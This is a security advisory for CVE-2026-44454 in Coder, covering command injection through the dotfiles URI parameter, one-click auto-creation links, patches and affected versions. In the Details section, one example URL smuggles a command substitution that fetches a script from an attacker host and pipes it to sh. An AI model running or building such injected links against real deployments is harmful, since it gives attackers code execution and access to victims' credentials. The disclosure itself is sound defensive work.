CVE-2026-44454: Coder vulnerable to workspace auto-creation via crafted URL parameters without user consent

Published Jul 2, 2026
·
Updated

Command injection via dotfiles URI parameter combined with workspace auto-creation

Summary

The dotfiles registry module passed unsanitized user input to shell commands, allowing arbitrary code execution inside a provisioned workspace. Any user who supplied a crafted dotfilesuri value (for example, one containing shell command substitution such as $(...)) could achieve command execution in their own workspace. The Create Workspace page's mode=auto deep links amplified this into a one-click attack: an attacker could craft a URL that prefilled param.dotfilesuri and silently provisioned a workspace with the attacker-controlled value, with no explicit user confirmation.

Details

Command injection in the dotfiles module (root cause)

The dotfiles module interpolated the user-provided dotfilesuri value directly into a shell script and executed it without input validation. Because the value was expanded by the shell, payloads using command substitution ($(...)), command separators (;, |, &&), or backticks were interpreted before the coder dotfiles CLI was invoked. The Coder CLI itself uses exec.CommandContext() with an argument array and is not vulnerable; the injection occurred earlier, during shell expansion inside the module. As a result, a user who entered a crafted dotfilesuri obtained arbitrary code execution in their workspace, even without mode=auto.

Auto-creation amplification (mode=auto)

The Create Workspace page supported a mode=auto query parameter that, combined with param. URL parameters, automatically created a workspace on page load without displaying a confirmation prompt. An attacker could craft a malicious URL pointing to a victim's Coder deployment and set arbitrary template parameter values (for example, param.dotfilesuri). When an authenticated user clicked the link, the workspace was created immediately with the attacker-supplied parameters, turning the command injection above into a one-click, no-consent attack.

Example URL:

https://<deployment>/templates/<template>/workspace?mode=auto&param.dotfilesuri=foo$(curl https://attacker.example/x | sh).com

Impact

Arbitrary code execution inside the victim's workspace. Depending on the workspace's privileges, this may expose Git credentials, secrets, and workspace files, and can provide a foothold for lateral movement. With mode=auto, exploitation required only that an authenticated user click an attacker-supplied link to a template that uses the dotfiles module.

Patches

coder/registry (primary fix)

Input validation was added to the dotfiles module to reject URIs and usernames containing special characters, and the unsafe eval/sh -c usage was removed. This eliminates the command injection at its source.

- https://github.com/coder/registry/pull/703

coder/coder (defense-in-depth)

A consent dialog was added that displays all prefilled param. values and blocks creation until the user explicitly clicks Confirm and Create. This removes the mode=auto one-click amplification vector.

- Fix commit: https://github.com/coder/coder/commit/60e3ab7632f42415d283b9fd5622ee53a4639ceb (PR #22011) - Patched releases: - v2.29.7 (ESR) - v2.30.2 (mainline)

Recognition We'd like to thank Aviv Donenfeld for responsibly disclosing this issue in accordance with https://coder.com/security/policy

Other sources

Coder allows organizations to provision remote development environments via Terraform. Prior to versions 2.29.7 and 2.30.2, the dotfiles registry module passed unsanitized user input to shell commands, allowing arbitrary code execution inside a provisioned workspace. Any user who supplied a crafted dotfilesuri value (for example, one containing shell command substitution such as $(...)) could achieve command execution in their own workspace. The Create Workspace page's mode=auto deep links amplified this into a one-click attack: an attacker could craft a URL that prefilled param.dotfilesuri and silently provisioned a workspace with the attacker-controlled value, with no explicit user confirmation. In versions 2.29.7 and 2.30.2, input validation was added to the dotfiles module to reject URIs and usernames containing special characters, and the unsafe eval/sh -c usage was removed. This eliminated the command injection at its source.

NVD

Affected Software

5 affected componentsFixes available
go/github.com/coder/coder<=0.27.3
go/github.com/coder/coder/v2>=2.30.0<2.30.2
2.30.2
go/github.com/coder/coder/v2<2.29.7
2.29.7
Coder Coder Go<2.29.7
Coder Coder Go>=2.30.0<2.30.2

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade go/github.com/coder/coder/v2 to a version that resolves this vulnerability.

    Fixed in 2.30.2
  2. Upgrade

    Upgrade go/github.com/coder/coder/v2 to a version that resolves this vulnerability.

    Fixed in 2.29.7
  3. Upgrade

    Upgrade coder/coder to a version that resolves this vulnerability.

    Fixed in 2.29.7Patch v2.29.7
  4. Upgrade

    Upgrade coder/coder to a version that resolves this vulnerability.

    Fixed in 2.30.2Patch v2.30.2

Event History

Jul 2, 2026
Advisory Published
via GitHub·06:14 PM
Data Sourced
via GitHub·06:14 PM
DescriptionSeverityWeaknessAffected Software
Jul 7, 2026
CVE Published
via MITRE·08:16 PM
Data Sourced
via MITRE·08:16 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·09:17 PM
RemedyDescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2026-44454?

The severity of CVE-2026-44454 is high with a score of 8.1.

2

How does CVE-2026-44454 allow command injection?

CVE-2026-44454 allows command injection through the dotfiles URI parameter when unsanitized user input is passed to shell commands.

3

What are the implications of CVE-2026-44454?

The implications of CVE-2026-44454 include the potential for arbitrary code execution within a provisioned workspace.

4

Which software is affected by CVE-2026-44454?

CVE-2026-44454 affects the go/github.com/coder/coder/v2 and go/github.com/coder/coder software.

5

How can I mitigate CVE-2026-44454?

To mitigate CVE-2026-44454, ensure that user input for the dotfiles URI is properly sanitized before being passed to shell commands.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203